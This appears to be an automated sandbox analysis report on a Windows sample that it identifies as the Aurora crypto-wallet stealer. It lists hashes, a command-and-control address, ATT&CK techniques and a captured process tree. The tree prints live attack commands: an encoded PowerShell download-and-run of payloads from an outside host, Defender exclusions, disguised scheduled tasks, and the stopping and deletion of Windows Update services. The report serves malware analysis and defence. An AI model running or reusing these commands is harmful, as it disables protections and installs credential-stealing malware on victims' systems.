aurora | 2bcbbe13d000426f4be27871e3c472dbf33673551a684229e9234e6387b045e1

Analysis

max time kernel
150s
max time network
34s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
03-04-2023 09:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Loader.exe
Size

856KB
MD5

3b8f84a1a0761f8bab9d6b0a90e6949e
SHA1

9c758991135d977d2660f1b814b973db0e119efc
SHA256

2bcbbe13d000426f4be27871e3c472dbf33673551a684229e9234e6387b045e1
SHA512

3bae19a2a3abddc66faf78cab3caf99aa1988607ca844294d37450a7eb3be2454ae1a4034e38df4dabef63a2f8fd5b9084fccfcaf3d2b72ff5c62cb79bdae2e1
SSDEEP

3072:HnoTMG2OWGJAez/eyN/09XMT9THz4JHSV0h2sFeJOMkdIGq:HYfAebec09Q0ZwQCGq

Score

10^/10

aurora evasion stealer

Malware Config

Extracted

Family

aurora

107.182.129.73:8081

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

SmartDefRun.exepowershell.EXE

description	pid	process	target process
PID 1944 created 1208	1944	SmartDefRun.exe	Explorer.EXE
PID 1944 created 1208	1944	SmartDefRun.exe	Explorer.EXE
PID 1944 created 1208	1944	SmartDefRun.exe	Explorer.EXE
PID 1944 created 1208	1944	SmartDefRun.exe	Explorer.EXE
PID 1160 created 416	1160	powershell.EXE	winlogon.exe

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 432 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 5 IoCs

Processes:

C4Loader.exenew2.exeSysApp.exeSmartDefRun.exefodhelper.exe

pid process

1500 C4Loader.exe
1284 new2.exe
1436 SysApp.exe
1944 SmartDefRun.exe
1960 fodhelper.exe
Loads dropped DLL 7 IoCs

Processes:

powershell.exe

pid process

432 powershell.exe
432 powershell.exe
432 powershell.exe
432 powershell.exe
432 powershell.exe
432 powershell.exe
432 powershell.exe

flow	pid	process
4	432	powershell.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

pid	process
1500	C4Loader.exe
1284	new2.exe
1436	SysApp.exe
1944	SmartDefRun.exe
1960	fodhelper.exe

Drops file in System32 directory 6 IoCs

Processes:

powershell.exepowershell.exepowershell.EXEpowershell.EXEsvchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\System32\Tasks\Telemetry Logging	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Telemetry Logging	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

C4Loader.exeSmartDefRun.exepowershell.EXE

description	pid	process	target process
PID 864 set thread context of 1260	864	C4Loader.exe	InstallUtil.exe
PID 1944 set thread context of 2012	1944	SmartDefRun.exe	dialer.exe
PID 1160 set thread context of 1016	1160	powershell.EXE	dllhost.exe

Drops file in Program Files directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe SmartDefRun.exe
Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

804 sc.exe
1260 sc.exe
1692 sc.exe
1384 sc.exe
1788 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

676 schtasks.exe
1352 schtasks.exe

description	ioc	process
File created	C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe	SmartDefRun.exe

description	ioc	process
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe

pid	process
804	sc.exe
1260	sc.exe
1692	sc.exe
1384	sc.exe
1788	sc.exe

pid	process
676	schtasks.exe
1352	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4002d24f2366d901	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeSmartDefRun.exepowershell.exepowershell.exeSysApp.exepowershell.EXEpowershell.EXEdllhost.exe

pid	process
432	powershell.exe
432	powershell.exe
432	powershell.exe
432	powershell.exe
432	powershell.exe
432	powershell.exe
432	powershell.exe
432	powershell.exe
432	powershell.exe
1944	SmartDefRun.exe
1944	SmartDefRun.exe
1996	powershell.exe
1944	SmartDefRun.exe
1944	SmartDefRun.exe
1944	SmartDefRun.exe
1944	SmartDefRun.exe
884	powershell.exe
1436	SysApp.exe
1944	SmartDefRun.exe
1944	SmartDefRun.exe
1436	SysApp.exe
1436	SysApp.exe
1436	SysApp.exe
1436	SysApp.exe
1160	powershell.EXE
1056	powershell.EXE
1160	powershell.EXE
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe
1016	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1208 Explorer.EXE

pid	process
1208	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exesvchost.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	884	powershell.exe
Token: SeDebugPrivilege	1160	powershell.EXE
Token: SeDebugPrivilege	1056	powershell.EXE
Token: SeDebugPrivilege	1160	powershell.EXE
Token: SeDebugPrivilege	1016	dllhost.exe
Token: SeAuditPrivilege	840	svchost.exe
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

C4Loader.exeInstallUtil.exepowershell.exe

description	pid	process	target process
PID 864 wrote to memory of 1680	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1680	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1680	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1680	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1680	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1680	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1680	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1680	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1312	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1312	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1312	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1312	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1312	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1312	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1312	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1312	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1324	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1324	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1324	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1324	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1324	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1324	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1324	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1324	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1340	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1340	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1340	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1340	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1340	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1340	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1340	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1340	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1260	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1260	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1260	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1260	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1260	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1260	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1260	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1260	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1260	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1260	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1260	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1260	864	C4Loader.exe	InstallUtil.exe
PID 864 wrote to memory of 1260	864	C4Loader.exe	InstallUtil.exe
PID 1260 wrote to memory of 432	1260	InstallUtil.exe	powershell.exe
PID 1260 wrote to memory of 432	1260	InstallUtil.exe	powershell.exe
PID 1260 wrote to memory of 432	1260	InstallUtil.exe	powershell.exe
PID 1260 wrote to memory of 432	1260	InstallUtil.exe	powershell.exe
PID 432 wrote to memory of 1500	432	powershell.exe	C4Loader.exe
PID 432 wrote to memory of 1500	432	powershell.exe	C4Loader.exe
PID 432 wrote to memory of 1500	432	powershell.exe	C4Loader.exe
PID 432 wrote to memory of 1500	432	powershell.exe	C4Loader.exe
PID 432 wrote to memory of 1284	432	powershell.exe	new2.exe
PID 432 wrote to memory of 1284	432	powershell.exe	new2.exe
PID 432 wrote to memory of 1284	432	powershell.exe	new2.exe
PID 432 wrote to memory of 1284	432	powershell.exe	new2.exe
PID 432 wrote to memory of 1436	432	powershell.exe	SysApp.exe
PID 432 wrote to memory of 1436	432	powershell.exe	SysApp.exe
PID 432 wrote to memory of 1436	432	powershell.exe	SysApp.exe
PID 432 wrote to memory of 1436	432	powershell.exe	SysApp.exe
PID 432 wrote to memory of 1944	432	powershell.exe	SmartDefRun.exe
PID 432 wrote to memory of 1944	432	powershell.exe	SmartDefRun.exe
PID 432 wrote to memory of 1944	432	powershell.exe	SmartDefRun.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:840

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
3⤵
PID:1972

C:\Windows\system32\taskeng.exe
taskeng.exe {92F8EEC5-9304-43D3-822E-535F4EB1BE81} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
PID:1328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+'T'+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](114)+'st'+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+'s'+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Windows\system32\taskeng.exe
taskeng.exe {B7EC0C21-949F-4D8B-AFBF-36D7AC52B1F0} S-1-5-21-3430344531-3702557399-3004411149-1000:WFSTZEPN\Admin:Interactive:[1]
3⤵
PID:2040

C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
4⤵
- Executes dropped EXE
PID:1960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:696

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:1040

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1076

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:600

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{469c760b-0ea9-4588-bfd7-e51db5cab99f}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:1680

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:1312

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:1324

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:1340

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
5⤵
- Executes dropped EXE
PID:1500

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
5⤵
- Executes dropped EXE
PID:1284

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1436

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
6⤵
- Creates scheduled task(s)
PID:1352

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kryoeujoq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenMachine' /tr '''C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenMachine' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenMachine" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:884

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenMachine /tr "'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe'"
3⤵
- Creates scheduled task(s)
PID:676

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:1728

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1384

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1788

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:804

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1260

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1692

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1916

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1732

C:\Windows\System32\reg.exe
